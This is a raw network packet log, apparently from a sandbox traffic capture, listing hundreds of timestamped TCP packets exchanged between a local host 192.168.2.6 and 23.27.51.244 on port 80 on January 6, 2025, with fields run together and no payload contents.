    Jan 6, 2025 06:03:59.085922003 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.085947037 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.086024046 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.086034060 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.086044073 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.086054087 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.086065054 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.086070061 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.086075068 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.086085081 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.086097956 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.086122990 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.086150885 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.086309910 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.086321115 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.086329937 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.086340904 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.086352110 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.086359978 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.086361885 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.086371899 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.086381912 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.086393118 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.086399078 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.086399078 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.086421967 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.086446047 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.086596966 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.086657047 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.086694956 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.086707115 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.086716890 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.086729050 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.086738110 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.086740017 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.086750031 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.086760998 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.086776018 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.086776018 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.086915016 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.086967945 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.086978912 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.086988926 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.086999893 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.087009907 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.087018013 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.087022066 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.087033033 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.087038040 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.087043047 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.087053061 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.087054968 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.087091923 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.087091923 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.087116003 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.087277889 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.087289095 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.087299109 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.087310076 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.087325096 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.087335110 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.087337971 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.087341070 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.087347984 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.087356091 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.087385893 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.087385893 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.087398052 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.087409019 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.087418079 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.087428093 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.087433100 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.087438107 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.087449074 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.087459087 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.087462902 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.087470055 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.087480068 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.087482929 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.087491989 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.087497950 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.087502003 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.087532997 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.087549925 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.088057041 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.088068008 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.088078022 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.088088989 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.088099957 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.088099957 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.088109970 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.088116884 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.088120937 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.088131905 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.088141918 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.088143110 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.088165998 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.088181973 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.088417053 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.088427067 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.088437080 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.088448048 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.088458061 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.088464975 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.088469028 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.088479996 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.088485003 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.088489056 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.088500023 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.088504076 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.088510036 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.088519096 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.088520050 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.088530064 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.088541031 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.088538885 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.088558912 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.088579893 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.088746071 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.088757038 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.088767052 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.088792086 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.088816881 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.088903904 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.088913918 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.088931084 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.088947058 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.088952065 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.088956118 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.088965893 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.088975906 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.088985920 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.088995934 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.088995934 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.089000940 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.089011908 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.089015961 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.089021921 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.089032888 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.089035034 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.089044094 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.089054108 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.089059114 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.089063883 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.089072943 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.089075089 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.089085102 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.089097023 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.089097977 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.089107037 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.089118958 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.089127064 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.089140892 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.089163065 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.176126003 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.176162958 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.176179886 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.176192045 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.176202059 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.176208973 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.176213026 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.176245928 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.176245928 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.176276922 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.176306963 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.176341057 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.176352024 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.176362991 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.176373005 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.176383018 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.176384926 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.176407099 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.176508904 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.176520109 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.176553965 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.176621914 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.176632881 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.176639080 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.176651001 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.176753044 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.176758051 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.176764011 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.176774979 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.176784992 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.176793098 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.176795959 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.176806927 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.176816940 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.176819086 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.176826954 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.176851034 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.177010059 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.177022934 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.177037954 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.177052021 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.177053928 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.177062988 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.177072048 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.177099943 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.177294970 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.177304983 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.177314997 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.177325010 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.177331924 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.177335978 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.177356958 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.177366972 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.177376986 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.177387953 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.177386999 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.177398920 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.177408934 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.177409887 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.177419901 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.177431107 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.177433968 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.177452087 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.177470922 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.177587032 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.177714109 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.177731991 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.177742004 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.177752972 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.177762985 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.177763939 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.177772999 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.177779913 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.177783966 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.177793980 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.177799940 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.177803993 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.177814960 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.177818060 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.177825928 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.177833080 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.177836895 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.177848101 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.177858114 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.177881002 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.178164005 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.178174973 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.178184986 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.178195000 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.178205013 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.178208113 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.178215027 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.178225994 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.178232908 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.178246021 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.178306103 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.178316116 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.178337097 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.178350925 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.178478003 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.178488970 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.178498983 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.178512096 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.178519964 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.178522110 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.178539038 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.178539991 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.178550005 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.178555012 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.178560972 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.178571939 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.178579092 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.178581953 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.178596020 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.178601980 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.178606033 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.178616047 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.178617954 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.178627014 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.178639889 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.178663015 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.178986073 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.178997993 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.179008007 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.179018021 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.179024935 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.179028988 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.179049969 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.179073095 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.179239988 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.179250002 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.179260015 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.179270983 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.179280043 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.179281950 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.179291010 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.179301023 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.179301977 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.179310083 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.179318905 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.179327965 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.179335117 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.179339886 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.179358959 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.179380894 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.179531097 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.179539919 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.179549932 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.179559946 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.179569006 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.179579973 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.179589987 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.179600954 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.179609060 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.179615974 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.179615974 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.179617882 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.179627895 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.179670095 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.179670095 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.179670095 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.179815054 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.179857016 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.179867029 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.179877043 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.179886103 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.179896116 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.179903984 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.179907084 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.179913044 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.179917097 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.179927111 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.179929972 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.179938078 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.179944992 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.179948092 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.179958105 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.179966927 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.179968119 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.179977894 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.179991007 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.179994106 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.180000067 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.180007935 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.180025101 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.266784906 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.266809940 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.266819954 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.266829014 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.266839027 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.266848087 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.266864061 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.266875029 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.266932011 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.266942978 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.266999960 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.267009020 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.267018080 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.267029047 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.267041922 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.267090082 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.267119884 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.267131090 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.267163992 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.267199993 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.267210007 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.267220974 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.267231941 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.267239094 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.267244101 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.267255068 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.267257929 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.267278910 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.267302990 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.267335892 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.267373085 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.267445087 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.267456055 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.267467022 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.267477036 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.267477989 CET804970923.27.51.244192.168.2.6
